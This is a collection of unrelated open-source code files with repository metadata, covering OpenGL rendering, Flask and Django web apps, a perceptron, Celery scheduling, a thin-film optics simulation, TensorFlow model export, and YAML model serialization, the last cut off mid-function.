c9faad80f5c8d95ffc3a2906cb7f3de2e01d37e6 | 0b655cb2f170743e6a312931f1905278ce8f0c23 | /lab4/core/scene.py | bb8e10f7900598ab4f0a36cfb9ff38ece5f982d6 | [] | no_license | VKuzia/gl-py-labs | af9bdb652e71252c73a723937911a11ac1a2083d | 6172d2756413122b160745cd1aa771e5cd6b6416 | refs/heads/master | 2023-07-15T00:50:45.664591 | 2021-08-15T13:49:39 | 2021-08-15T13:49:39 | 368,591,965 | 1 | 0 | null | 2021-08-15T13:49:39 | 2021-05-18T16:07:30 | Python | UTF-8 | Python | false | false | 1,055 | py | import moderngl
import typing as tp
from moderngl_window.opengl.vao import VAO
from pyrr import Matrix44
class Scene:
    """Owns a shader program together with its camera, projection and light
    uniforms, and renders (geometry, model-matrix) pairs with it.

    Construction uploads the view matrix (from the camera translation), the
    perspective projection (from the aspect ratio) and a fixed light
    position/colour into the program's uniforms.
    """

    def __init__(self, program: moderngl.Program, aspect_ratio: float, camera_translation):
        self.program = program
        self.camera_translation_matrix = Matrix44.from_translation(camera_translation, dtype='f4')
        self.update_view(self.camera_translation_matrix)
        self.update_proj(aspect_ratio)
        # Single fixed light shared by everything drawn with this program.
        self.program['global_light_pos'] = 1.0, 1.0, 2.0
        self.program['light_color'] = 1.0, 1.0, 1.0

    def update_proj(self, aspect_ratio: float):
        """Recompute the perspective projection for *aspect_ratio* and upload it."""
        projection = Matrix44.perspective_projection(30, aspect_ratio, 0.1, 100, dtype='f4')
        self.program['proj'].write(projection)

    def update_view(self, camera_matrix):
        """Upload *camera_matrix* as the view transform."""
        self.program['view'].write(camera_matrix)

    def render(self, rendering_data: tp.Tuple[VAO, Matrix44]):
        """Draw every (geometry, model matrix) pair with this scene's program."""
        for mesh, model_matrix in rendering_data:
            self.program['model'].write(model_matrix)
            mesh.render(self.program)
| [
"noreply@github.com"
] | noreply@github.com |
2e22a7b99d1f8c4f1f5ce4eb4dafcbd83332bbf1 | d5fe9d0c7c93c3250b9e212435b02d8373dec091 | /code/65.py | 1dd66f853d153787cc61be6ee33a280ffb264627 | [] | no_license | HarshaaArunachalam/GUV | 6937adb84f0928f08c9fbc519310abc06ef3541a | c047887bf6c19a4950c5f634111e1c02966367e5 | refs/heads/master | 2020-05-31T10:52:23.280052 | 2019-08-10T20:23:11 | 2019-08-10T20:23:11 | 190,249,464 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | N=int(input())
Na=input().split()
Na=list(Na)
for i in Na:
if(int(i)<N):
print(i)
| [
"noreply@github.com"
] | noreply@github.com |
f58b598fb89ada29e134b0652a5a53c1f4e340a5 | bdc486ec6dc0e5c51f0d80c35d024ffafe02fee6 | /app/__init__.py | 913d5313f12e81eb68069dbb1b05e9df627bcdef | [] | no_license | ikaru942/Flask-Pundit | e28f655ca4938e02cf16066af5815316b49f4e79 | d4a129a7c2e9e1f72d4b5f100eab4f270935963f | refs/heads/master | 2020-05-02T08:23:27.225777 | 2019-03-27T21:38:06 | 2019-03-27T21:38:06 | 177,495,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | from flask import Flask
from config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_login import LoginManager
from elasticsearch import Elasticsearch
# Application bootstrap. Order matters: `app` must exist before the
# extensions below are bound to it.
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
login = LoginManager(app)
# Endpoint Flask-Login redirects anonymous users to on @login_required views.
login.login_view = 'login'
# Elasticsearch is optional: only wired up when ELASTICSEARCH_URL is set,
# otherwise the attribute is None (search disabled).
app.elasticsearch = Elasticsearch([app.config['ELASTICSEARCH_URL']]) \
    if app.config['ELASTICSEARCH_URL'] else None

# Imported at the bottom, presumably to avoid the usual circular import
# (app.models importing `db` from this module) — TODO confirm.
from app import models
"imaya.karunanayake16@st.johns.edu"
] | imaya.karunanayake16@st.johns.edu |
586070c8bec45c7012d499b7c9a7ec6d6b2afe7b | df8cfbcbd0156f5497fbffa5266f4db1bdb21322 | /neural_networks/rosenblatt.py | 143d2a08f47286edd46b9a8d91381fe2192b83c2 | [] | no_license | NEWjers/AI | 9a8b893101d4fe9f2c13332ec8d6f1c8a58fbb70 | 63a5486f0a8cae6e4113d5757b46da7c54f26866 | refs/heads/main | 2023-05-13T19:35:15.002705 | 2021-06-08T06:28:16 | 2021-06-08T06:28:16 | 374,904,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 865 | py | import numpy as np
class RBPerceptron:
def __init__(self, number_of_epochs = 100, learning_rate = 0.1):
self.number_of_epochs = number_of_epochs
self.learning_rate = learning_rate
def train(self, X, D):
num_features = X.shape[1]
self.w = np.zeros(num_features + 1)
for i in range(self.number_of_epochs):
for sample, desired_outcome in zip(X, D):
prediction = self.predict(sample)
difference = (desired_outcome - prediction)
weight_update = self.learning_rate * difference
self.w[1:] += weight_update * sample
self.w[0] += weight_update
return self
def predict(self, sample):
outcome = np.dot(sample, self.w[1:]) + self.w[0]
return np.where(outcome > 0, 1, 0) | [
"serjsonet@gmail.com"
] | serjsonet@gmail.com |
4105691310284155e93357df83d7741f403738fd | a6f4e2e2b2e25f7af509598327aaaa5c795433ac | /django_gocardless/views.py | 7208815d058b283889ea24034697e84804b85aa8 | [] | no_license | adamcharnock/django-gocardless | 4042e9dc6a179cf2030064855b82411adc960470 | ac126fcb12baf8a33472f0e22b29ede2b92e27ed | refs/heads/master | 2021-01-18T13:24:22.265030 | 2014-05-08T17:56:35 | 2014-05-08T17:56:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,746 | py | import json
import logging
from django.conf import settings
from django.http.response import HttpResponseBadRequest
from django.views.generic.base import View, logger
from gocardless.utils import generate_signature
class GoCardlessPayloadMixin(object):
def get_payload(self, request):
if not hasattr(self, '_payload'):
if request.method.lower() == 'get':
self._payload = request.GET.dict()
else:
self._payload = json.loads(request.body)['payload']
return self._payload
class GoCardlessSignatureMixin(GoCardlessPayloadMixin):
    """ Will verify a GoCardless signature """

    # Subclasses set this True to call verify_signature() themselves.
    manual_signature_check = False

    def verify_signature(self, request):
        """Recompute the payload signature and compare with the one supplied.

        Returns True only when the payload carries a signature matching the
        one generated from GOCARDLESS_APP_SECRET.
        """
        import hmac  # local import keeps this fix self-contained

        data = self.get_payload(request)
        if not data:
            logger.warning('No payload or request data found')
            return False
        pms = data.copy()
        # Gracefully reject payloads without a signature instead of
        # raising KeyError (which would 500 on malformed webhooks).
        supplied = pms.pop('signature', None)
        if supplied is None:
            logger.warning('Payload is missing a signature')
            return False
        expected = generate_signature(pms, settings.GOCARDLESS_APP_SECRET)
        # Constant-time comparison avoids leaking signature bytes via timing.
        return hmac.compare_digest(expected, supplied)

    def dispatch(self, request, *args, **kwargs):
        """Verify the signature (unless manual) before normal dispatch."""
        if not self.manual_signature_check and not self.verify_signature(request):
            return self.handle_invalid_signature(request, *args, **kwargs)
        response = super(GoCardlessSignatureMixin, self).dispatch(request, *args, **kwargs)
        response['Cache-Control'] = 'no-cache'
        return response

    def handle_invalid_signature(self, request, *args, **kwargs):
        """Return a 400 response for requests whose signature failed to verify."""
        response = HttpResponseBadRequest('Signature did not validate')
        response['Cache-Control'] = 'no-cache'
        return response
class GoCardlessView(GoCardlessSignatureMixin, View):
    """Base view rejecting requests with a missing or invalid GoCardless signature."""
    pass
"adam@omniwiki.co.uk"
] | adam@omniwiki.co.uk |
def init(args=None):
    """Return the configured DENY_UNKNOWN value, defaulting to 'no'.

    args: mapping that may contain a 'DENY_UNKNOWN' key, or None.
    """
    try:
        name = args['DENY_UNKNOWN']
    except (TypeError, KeyError):
        # TypeError: args is None/unsubscriptable; KeyError: key absent.
        # These are the only cases the old bare `except:` ever hid here.
        name = 'no'
    return name
#def init
| [
"hectorgh@gmail.com"
] | hectorgh@gmail.com |
b1ff8b84513e9202e906360be1f456af18f61e26 | 72a3c08aefbdc7d797bc19a93b9cbcf588621f38 | /cil/migrations/0007_auto_20190220_1446.py | 5c5f4e6c15cb9345b6c9819bc9e083d4d0b31c07 | [] | no_license | KapilM26/web-portal | 31bf0b4c05de454d5363b9a0d652291ad5a9b809 | 0138c5055cd19537acf0dec80c04adabf5f1bdc4 | refs/heads/master | 2020-05-04T22:19:38.476546 | 2019-10-19T19:06:09 | 2019-10-19T19:06:09 | 177,403,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # Generated by Django 2.1.7 on 2019-02-20 14:46
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make `phone` a nullable CharField(max_length=100) on
    profile, tempprofileadd and tempprofileedit."""

    dependencies = [
        ('cil', '0006_auto_20190220_1436'),
    ]

    operations = [
        migrations.AlterField(
            model_name='profile',
            name='phone',
            field=models.CharField(blank=True, max_length=100, null=True),
        ),
        migrations.AlterField(
            model_name='tempprofileadd',
            name='phone',
            field=models.CharField(blank=True, max_length=100, null=True),
        ),
        migrations.AlterField(
            model_name='tempprofileedit',
            name='phone',
            field=models.CharField(blank=True, max_length=100, null=True),
        ),
    ]
| [
"kapilm2602@gmail.com"
] | kapilm2602@gmail.com |
6a6762c469e81d373c201c6a168dd6ee3e4c665c | ed75b99e824b5724746d72f2d529781eccf8ef0d | /biostar/celeryconfig.py | 8b2c7b42b8db811498eb7a13032c3e9671c2e8aa | [
"MIT"
] | permissive | satra/biostar-central | 6799c4df4d12de1278f60fb2b29623acf8cc7640 | 794c67d2972a4fe700c79841f5f3c0c562352738 | refs/heads/master | 2021-01-12T20:32:14.356389 | 2014-03-20T15:37:27 | 2014-03-20T15:37:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,202 | py | from __future__ import absolute_import
from datetime import timedelta
from celery.schedules import crontab
# Celery results are stored through django-celery's database backend,
# and the Django ORM itself acts as the broker.
CELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'
BROKER_URL = 'django://'

# NOTE(review): pickle (de)serialization executes arbitrary code from the
# broker — confirm the broker is private/trusted before keeping this.
CELERY_TASK_SERIALIZER = 'pickle'
CELERY_ACCEPT_CONTENT = ['pickle']

# Periodic maintenance tasks, all dispatched through the generic
# biostar.celery.call_command wrapper around Django management commands.
CELERYBEAT_SCHEDULE = {
    'prune_data': {
        'task': 'biostar.celery.call_command',
        'schedule': timedelta(days=1),
        'kwargs': dict(name="prune_data")
    },
    'sitemap': {
        'task': 'biostar.celery.call_command',
        'schedule': timedelta(hours=6),
        'kwargs': dict(name="sitemap")
    },
    'update_index': {
        'task': 'biostar.celery.call_command',
        'schedule': timedelta(minutes=15),
        'args': ["update_index"],
        'kwargs': {"age": 1}
    },
    'hourly_dump': {
        'task': 'biostar.celery.call_command',
        'schedule': crontab(minute=10),
        'args': ["biostar_pg_dump"],
        'kwargs': {"hourly": True}
    },
    'daily_dump': {
        'task': 'biostar.celery.call_command',
        'schedule': crontab(hour=22),
        'args': ["biostar_pg_dump"],
    },
}

CELERY_TIMEZONE = 'UTC'
"istvan.albert@gmail.com"
] | istvan.albert@gmail.com |
4c8789502e04a606f59277018560cc68fbb0db97 | 2cd43643bd8f09be05f91b9d3bc75fb3eb373938 | /management/inventory_manager.py | 3dca501b4f2341ba81783f2123d430e1710fb0c6 | [] | no_license | NguyenDytrich/BiblioTech | 0c168b5138042cd3f37d5ad35d0e8e5acaa371a8 | 4fea0598313e1ee96f975f5f0bfc388d96ac14a6 | refs/heads/dev | 2022-12-31T15:57:11.305039 | 2020-10-27T02:25:08 | 2020-10-27T02:25:08 | 300,519,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,186 | py | from django.utils import timezone
from library.models import Item, ItemGroup
def create_item_record(
    itemgroup_id,
    library_id,
    serial_num,
    condition,
    availability,
    notes=None,
    date_acquired=None,
    last_inspected=None,
):
    """
    Create, validate and save a new Item record; returns the saved instance.

    date_acquired / last_inspected default to the current time when omitted.
    """
    record = Item(
        item_group=ItemGroup.objects.get(pk=itemgroup_id),
        library_id=library_id,
        serial_num=serial_num,
        condition=condition,
        availability=availability,
        notes=notes,
        date_acquired=date_acquired or timezone.now(),
        last_inspected=last_inspected or timezone.now(),
    )
    record.full_clean()
    record.save()
    # TODO: audit log entry
    return record
def create_itemgroup_record(
    make, model, description, default_checkout_len, moniker=None
):
    """Create, validate and save a new ItemGroup; returns the saved instance."""
    group = ItemGroup(
        make=make,
        model=model,
        description=description,
        moniker=moniker,
        default_checkout_len=default_checkout_len,
    )
    group.full_clean()
    group.save()
    return group
| [
"nguyen.dytrich@gmail.com"
] | nguyen.dytrich@gmail.com |
1ff9e56b2e34e0e6d083dcf2edf4cd1fc303a900 | 15206c297cfaf3995b0ccc7c8854fffb225f811b | /src/components/event/__init__.py | 64576b5c23f703efab46f42d4a0b862aa6562b39 | [] | no_license | baileythuong/CoderSchool-ticketbox | f5f67cf9d5d993d82d50279d7ba83758e8a568cb | 7a8dd5882c7206404e74a6a8babf32ca7dd3f079 | refs/heads/master | 2021-06-26T21:08:15.720262 | 2019-11-24T11:51:15 | 2019-11-24T11:51:15 | 223,735,900 | 0 | 0 | null | 2021-03-20T02:15:03 | 2019-11-24T11:51:47 | HTML | UTF-8 | Python | false | false | 1,528 | py | from flask import Blueprint, render_template, request, redirect, url_for, flash
from flask_login import current_user, login_user, login_required, logout_user
from src.models import Event
from src import app, db
from flask_login import current_user
from flask_moment import Moment
moment = Moment(app)  # enables client-side timestamp rendering in templates

# Blueprint for all /events pages; templates live two directories up.
event_blueprint = Blueprint('event_blueprint', __name__, template_folder='../../templates')
@event_blueprint.route("/events", methods=["GET", "POST"])
@login_required
def events():
    """List all events; on POST, create a new event owned by the current user."""
    events = Event.query.all()
    if request.method == "POST":
        # Build the event straight from the submitted form fields.
        # NOTE(review): form values are stored unvalidated — presumably the
        # form enforces types client-side; confirm server-side validation.
        new_event = Event(
            event_name = request.form["event_name"],
            event_description = request.form["event_description"],
            event_banner = request.form["event_banner"],
            event_address = request.form["event_address"],
            event_time = request.form["event_time"],
            ticket_price = request.form["ticket_price"],
            ticket_stock = request.form["ticket_stock"],
            user_id = current_user.id
        )
        db.session.add(new_event)
        db.session.commit()
        flash("Successfully added a new event.", "success")
        # Redirect so a browser refresh does not re-submit the form.
        return redirect(url_for("event_blueprint.events"))
    return render_template("event/events.html", events = events)
@event_blueprint.route("/events/<id>", methods=["GET", "POST"])
def event_detail(id):
    """Render the detail page for a single event.

    The previous version read request.args.get('action') but never used it;
    that dead assignment has been removed.
    """
    event = Event.query.get(id)
    return render_template("event/view_event.html", event=event)
| [
"baileythuong@gmail.com"
] | baileythuong@gmail.com |
081a8a4aa09d2eafd182ca6436c7c72218f6dcc5 | 3efee0cf2bd9e0c34bfdd94ab24a15cb88c04509 | /TMM_examples/TMM_fabry_perot.py | 13a671883453a7e29f38c3f94209049946a45615 | [
"MIT"
] | permissive | luwl85/Rigorous-Coupled-Wave-Analysis | bf5016ec70525f5e7bf59dfa93a03902afdfac12 | a28fdf90b5b5fc0fedacc8bb44a0a0c2f2a02143 | refs/heads/master | 2023-04-25T20:46:45.397976 | 2021-05-20T22:17:54 | 2021-05-20T22:17:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,761 | py | '''
TMM applied to a single uniform layer
should recover the analytic fabry perot solution
'''
import os
import sys
# Make the parent directory importable so TMM_functions can be found.
module_path = os.path.abspath(os.path.join('..'))
if module_path not in sys.path:
    sys.path.append(module_path)
import numpy as np
import matplotlib.pyplot as plt;
import cmath;
from TMM_functions import run_TMM_simulation as rTMM

## GOAL: simulate a BRAGG MIRROR at some wavelength (1 micron)
#%% DEFINE SIMULATION PARAMETers
#% General Units
degrees = np.pi/180;
L0 = 1e-6; #units of microns;
eps0 = 8.854e-12;
mu0 = 4*np.pi*10**-7;
c0 = 1/(np.sqrt(mu0*eps0))
## normalized units
#z' = k0*z;
#k = k/k0;

## REFLECTION AND TRANSMSSION SPACE epsilon and mu PARAMETERS
m_r = 1; e_r = 1; incident_medium = [e_r, m_r];
m_t = 1; e_t = 1; transmission_medium = [e_t, m_t];

## set wavelength scanning range
wavelengths = np.linspace(0.5,1.6,500); #500 nm to 1000 nm
kmagnitude_scan = 2 * np.pi / wavelengths; #no
omega = c0 * kmagnitude_scan; #using the dispersion wavelengths

#source parameters
theta = 0 * degrees; #%elevation angle; #off -normal incidence does not excite guided resonances...
phi = 0 * degrees; #%azimuthal angle

## incident wave properties, at this point, everything is in units of k_0
n_i = np.sqrt(e_r*m_r);

#k0 = np.sqrt(kx**2+ky**2+kz**2); we know k0, theta, and phi
#actually, in the definitions here, kx = k0*sin(theta)*cos(phi), so kx, ky here are normalized
kx = n_i*np.sin(theta)*np.cos(phi); #constant in ALL LAYERS; kx = 0 for normal incidence
ky = n_i*np.sin(theta)*np.sin(phi); #constant in ALL LAYERS; ky = 0 for normal incidence
print((n_i**2, kx**2+ky**2))
kz_inc = cmath.sqrt(e_r * m_r - kx ** 2 - ky ** 2);

normal_vector = np.array([0, 0, -1]) #positive z points down;
ate_vector = np.matrix([0, 1, 0]); #vector for the out of plane E-field

#ampltidue of the te vs tm modes (which are decoupled)
pte = 1; #1/np.sqrt(2);
ptm = 0; #cmath.sqrt(-1)/np.sqrt(2);
polarization_amplitudes = [pte, ptm]
k_inc = [kx, ky];
print('--------incident wave paramters----------------')
print('incident n_i: '+str(n_i))
print('kx_inc: '+str(kx)+' ky_inc: '+str(ky))
print('kz_inc: ' + str(kz_inc));
print('-----------------------------------------------')

#thickness 0 means L = 0, which only pops up in the xponential part of the expression
# Single uniform slab (eps=12, 0.6 um thick): should show Fabry-Perot fringes.
ER = [12]
UR = [1]
layer_thicknesses = [0.6]

## run simulation
Ref, Tran = rTMM.run_TMM_simulation(wavelengths, polarization_amplitudes, theta, phi, ER, UR, layer_thicknesses,\
                                    transmission_medium, incident_medium)

plt.figure();
plt.plot(wavelengths, Ref);
plt.plot(wavelengths, Tran);
plt.title('Spectrum of a Bragg Mirror')
plt.xlabel('wavelength ($\mu m$)')
plt.ylabel('R/T')
plt.legend(('Ref','Tran'))
plt.savefig('bragg_TMM.png');
plt.show();
"nzz2102@stanford.edu"
] | nzz2102@stanford.edu |
30793b7f98a113cd57ce8f99b439e0f8b0aff4d5 | 377acfd77a5cd281c80428b368248003ebdc33dc | /SpinboxExample.py | af01f7fc21f78144a1fa49e6577f32759a8ec33c | [] | no_license | roilhi/ExamplesTkinterPy | d049f0a4803fa35d31a623b05244e645622fa0d1 | 865fe983e07d9fdd04075e516b3dabd9f5e167df | refs/heads/main | 2023-06-11T22:03:24.219169 | 2021-07-07T21:56:30 | 2021-07-07T21:56:30 | 382,460,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | from tkinter import *
from tkinter import messagebox
root = Tk()
root.geometry("400x300")
# Spinboxes cycling through fixed sets of string values.
w = Spinbox(root, values=("Python", "HTML5", "Java", "Javascript"))
w.pack()
e = Spinbox(root, values=("Carne", "Verdura", "Pasta"))
e.pack()
# Blocks here until the window is closed.
root.mainloop()
"noreply@github.com"
] | noreply@github.com |
325a93e9027f90d97fe0431288393f2f293520c7 | 90b8d12660adc7dcf63bffce20ba1b7ede64386a | /official/vision/beta/serving/export_saved_model.py | 95027be136a8209c9e2a438072cf195c7d18771c | [
"Apache-2.0"
] | permissive | thalitadru/models | 7109797ed536ccb10e17bba6add0f571a1c1c96d | 7faaa572db44621f8e2998abd8dc6a22e86001f2 | refs/heads/master | 2022-05-05T15:04:01.683629 | 2022-03-23T16:20:46 | 2022-03-23T16:20:46 | 82,706,460 | 3 | 0 | null | 2017-02-21T17:14:13 | 2017-02-21T17:14:12 | null | UTF-8 | Python | false | false | 3,850 | py | # Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Vision models export binary for serving/inference.
To export a trained checkpoint in saved_model format (shell script):
EXPERIMENT_TYPE = XX
CHECKPOINT_PATH = XX
EXPORT_DIR_PATH = XX
export_saved_model --experiment=${EXPERIMENT_TYPE} \
--export_dir=${EXPORT_DIR_PATH}/ \
--checkpoint_path=${CHECKPOINT_PATH} \
--batch_size=2 \
--input_image_size=224,224
To serve (python):
export_dir_path = XX
input_type = XX
input_images = XX
imported = tf.saved_model.load(export_dir_path)
model_fn = imported.signatures['serving_default']
output = model_fn(input_images)
"""
from absl import app
from absl import flags
from official.common import registry_imports # pylint: disable=unused-import
from official.core import exp_factory
from official.modeling import hyperparams
from official.vision.beta.serving import export_saved_model_lib
FLAGS = flags.FLAGS

# Command-line interface: experiment selection, config overrides, and
# export destination/shape parameters.
flags.DEFINE_string(
    'experiment', None, 'experiment type, e.g. retinanet_resnetfpn_coco')
flags.DEFINE_string('export_dir', None, 'The export directory.')
flags.DEFINE_string('checkpoint_path', None, 'Checkpoint path.')
flags.DEFINE_multi_string(
    'config_file',
    default=None,
    help='YAML/JSON files which specifies overrides. The override order '
    'follows the order of args. Note that each file '
    'can be used as an override template to override the default parameters '
    'specified in Python. If the same parameter is specified in both '
    '`--config_file` and `--params_override`, `config_file` will be used '
    'first, followed by params_override.')
flags.DEFINE_string(
    'params_override', '',
    'The JSON/YAML file or string which specifies the parameter to be overriden'
    ' on top of `config_file` template.')
flags.DEFINE_integer(
    'batch_size', None, 'The batch size.')
flags.DEFINE_string(
    'input_type', 'image_tensor',
    'One of `image_tensor`, `image_bytes`, `tf_example` and `tflite`.')
flags.DEFINE_string(
    'input_image_size', '224,224',
    'The comma-separated string of two integers representing the height,width '
    'of the input to the model.')
flags.DEFINE_string('export_checkpoint_subdir', 'checkpoint',
                    'The subdirectory for checkpoints.')
flags.DEFINE_string('export_saved_model_subdir', 'saved_model',
                    'The subdirectory for saved model.')
'The subdirectory for saved model.')
def main(_):
  """Build the experiment config from flags, then export the saved model."""
  config = exp_factory.get_exp_config(FLAGS.experiment)
  # Apply YAML/JSON template files first, then the inline override string.
  for config_file in FLAGS.config_file or []:
    config = hyperparams.override_params_dict(
        config, config_file, is_strict=True)
  if FLAGS.params_override:
    config = hyperparams.override_params_dict(
        config, FLAGS.params_override, is_strict=True)
  config.validate()
  config.lock()

  image_size = [int(dim) for dim in FLAGS.input_image_size.split(',')]
  export_saved_model_lib.export_inference_graph(
      input_type=FLAGS.input_type,
      batch_size=FLAGS.batch_size,
      input_image_size=image_size,
      params=config,
      checkpoint_path=FLAGS.checkpoint_path,
      export_dir=FLAGS.export_dir,
      export_checkpoint_subdir=FLAGS.export_checkpoint_subdir,
      export_saved_model_subdir=FLAGS.export_saved_model_subdir)


if __name__ == '__main__':
  app.run(main)
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
5a25dd47a898ad67f1fd9e8ec65142b8677abeb6 | 161999144a6b35135a23f148097aba6601e19508 | /specviz/io/model_io/yaml_model_io.py | b6e771c38987886e0fd2ffd0080a300fdd2aeae0 | [] | no_license | Polapon/specviz | 0eec454916c7f6c147c9901e5d692eb94594ec37 | 744826291b0f1d5e9177a207b734f896771c4a21 | refs/heads/master | 2021-01-11T09:44:39.622149 | 2016-12-19T18:37:39 | 2016-12-19T18:37:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,165 | py | #
# Functions in this module support the reading and writing
# of astropy's spectral compound models from/to YAML files.
#
import os
import sys
import re
import dis
import copy
import yaml
from io import StringIO
from ast import literal_eval
from qtpy.QtWidgets import QFileDialog
from specviz.interfaces.factories import ModelFactory
from specviz.core.layer import ModelLayer
MODEL_FILE_FILTER = "YAML files (*.yaml)"  # file-dialog filter for model files
EXPRESSION_NAME = 'arithmetic behavior'    # YAML key holding the compound-model formula
MODEL_NAME = 'model'                       # YAML key holding the component-model map
# Helper functions
def _get_model_class_name(function):
class_string = str(function.__class__)
return class_string.split('\'>')[0].split(".")[-1]
# ---------- From YAML file to model ------------------------'
def _ingest_constraints(param_dict):
    """Extract the bounds/fixed/tied constraint maps from a YAML model dict.

    Mutates the nested dicts in place, converting string-encoded values
    back to their python types, and returns the three maps.
    """
    bounds = param_dict['constraints']['bounds']
    fixed = param_dict['constraints']['fixed']
    tied = param_dict['constraints']['tied']

    # bounds are tuples stored as strings so the user
    # can read and edit the file using a text editor.
    # They need to be converted back to python tuples.
    for name in bounds:
        bound = literal_eval(bounds[name])
        bounds[name] = (bound[0], bound[1])

    # TODO: re-do this when implementing ties
    # YAML returns different data types depending
    # on the model type. They need to be properly
    # converted.
    for name in fixed:
        if isinstance(fixed[name], str):
            fixed[name] = literal_eval(fixed[name])
            # NOTE(review): tied is only converted when the matching fixed
            # entry is a string — presumably both are strings together for
            # a given model type; confirm before relying on this.
            tied[name] = literal_eval(tied[name])

    return bounds, fixed, tied
def _build_single_model(in_map, model_name=None):
    """Instantiate one astropy model from its YAML dict description.

    in_map: mapping of entry name -> model description dict.
    model_name: key to use; defaults to the first (only) key in in_map.
    Returns the constructed model with parameter values applied.
    """
    if model_name is None:
        entry_name = list(in_map.keys())[0]
    else:
        entry_name = model_name

    model_name = in_map[entry_name]['class']

    # model names in ModelFactory do not terminate
    # with a redundant '1D' suffix; remove it.
    model_cls = ModelFactory.all_models[model_name[:-2]]

    param_dict = in_map[entry_name]
    name = param_dict['name']
    bounds, fixed, tied = _ingest_constraints(param_dict)

    # the model constructor call can directly handle
    # all parameter constraints, and the name
    model = model_cls(name=name, bounds=bounds, fixed=fixed, tied=tied)

    # parameter values are top level objects in the model
    # instance, unlike other parameter attributes such as
    # bounds and ties. They have to be set explicitly.
    parameters = param_dict['parameters']
    for pname in parameters:
        value = float(param_dict['parameters'][pname])
        setattr(model, pname, value)

    return model
# If no arithmetic behavior expression is know,
# build a compound model by adding together all
# models present in the map.
def _build_additive_model(in_map):
    """Sum every stored component; used when no arithmetic expression exists."""
    total = None
    for key in in_map[MODEL_NAME]:
        component = _build_single_model(in_map[MODEL_NAME], model_name=key)
        total = component if total is None else total + component
    return total
# If an arithmetic behavior expression is present,
# use it to build the compound model
def _build_compound_model(in_map):
    """Build a compound model from its components plus the stored formula.

    Returns a (model_layer, formula) tuple.
    """
    components = [_build_single_model(in_map[MODEL_NAME], model_name=key)
                  for key in in_map[MODEL_NAME]]
    formula = in_map[EXPRESSION_NAME]
    return ModelLayer.from_formula(components, formula), formula
def buildModelFromFile(fname):
    """
    Builds a compound model specified in a YAML file.

    This is the main entry point for the 'read from file'
    functionality. The caller is responsible for providing
    the full-path file name.

    Parameters
    ----------
    fname: str
        the fully qualified file name

    Returns
    -------
    (model, expression, directory): the (possibly compound) model, the
    arithmetic expression string (empty when absent), and the directory
    the file was read from.
    """
    directory = os.path.dirname(fname)

    # Context manager guarantees the handle is closed even if parsing fails
    # (the previous open/close pair leaked the handle on yaml errors).
    with open(fname, "r") as f:
        in_map = yaml.safe_load(f)

    expression = ""
    if MODEL_NAME in in_map:
        # compound model
        if EXPRESSION_NAME in in_map and len(in_map[EXPRESSION_NAME]) > 0:
            model, expression = _build_compound_model(in_map)
        else:
            # add all models together if no formula is present
            model = _build_additive_model(in_map)
    else:
        # single model
        model = _build_single_model(in_map)

    return model, expression, directory
# ---------- From model to YAML file ------------------------'
# Builds a dictionary with model constraints by directly
# referring to the _constraints attribute in a model.
def _build_constraints_dict(model):
constraints_dict = copy.deepcopy(model._constraints)
# bounds are stored as strings so
# they can be edited by the user.
for name in constraints_dict['bounds']:
bound1 = constraints_dict['bounds'][name][0]
bound2 = constraints_dict['bounds'][name][1]
constraints_dict['bounds'][name] = "(%s,%s)" % (str(bound1), str(bound2))
# clean up. This is something that exists only
# in single models and is not needed to rebuild
# the model from its YAML description.
if 'eqcons' in constraints_dict:
constraints_dict.pop('eqcons')
constraints_dict.pop('ineqcons')
return constraints_dict
# From a single model, builds the dict to be output to YAML file.
def _build_output_dict_single(model):
    """Serialize a single astropy model into a (name, dict) pair for YAML."""
    model_name = model.name
    parameters = {pname: str(pvalue)
                  for pname, pvalue in zip(model.param_names, model.parameters)}
    model_dict = {
        'name': model_name,
        'class': _get_model_class_name(model),
        'parameters': parameters,
        'constraints': _build_constraints_dict(model)}
    return model_name, model_dict
# From a compound model, builds the dict to be output to YAML file.
def _build_output_dict_compound(model):
    """Serialize one component of a compound model into a (name, dict) pair.

    Constraints are read directly off each Parameter object so the keys
    match the component's own parameter names (not the compound's).
    """
    model_name = model.name

    param_dict = {}
    for parameter_name, value in zip(model.param_names, model.parameters):
        param_dict[parameter_name] = str(value)

    # In a compound model, we don't want the constraints as stored in
    # the _constraints attribute, because these are keyed by the parameter
    # names *in the compound model*, such as 'amplitude_0'. We need keys
    # that relate directly with the underlying Parameter objects. Thus we
    # cannot use method _build_constraints_dict, since it uses a direct
    # copy of the _constraints attribute to drive its machinery.
    constraints_dict = {'bounds':{},'tied':{},'fixed':{}}
    for parameter_name in model.param_names:
        parameter = getattr(model, parameter_name)
        for constraint_name in parameter.constraints:
            constraint = getattr(parameter, constraint_name)
            constraints_dict[constraint_name][parameter_name] = str(constraint)

    model_dict = {
        'name': model_name,
        'class': _get_model_class_name(model),
        'parameters': param_dict,
        'constraints': constraints_dict}

    return model_name, model_dict
# Writes a dict to YAML file.
def _writeToFile(out_model_dict, model_directory, parent):
    """Prompt for a destination path and dump the model dict as YAML.

    Does nothing when the user cancels the dialog (empty file name).
    """
    fname = QFileDialog.getSaveFileName(parent, 'Save to file', model_directory)[0]
    if len(fname) > 0:
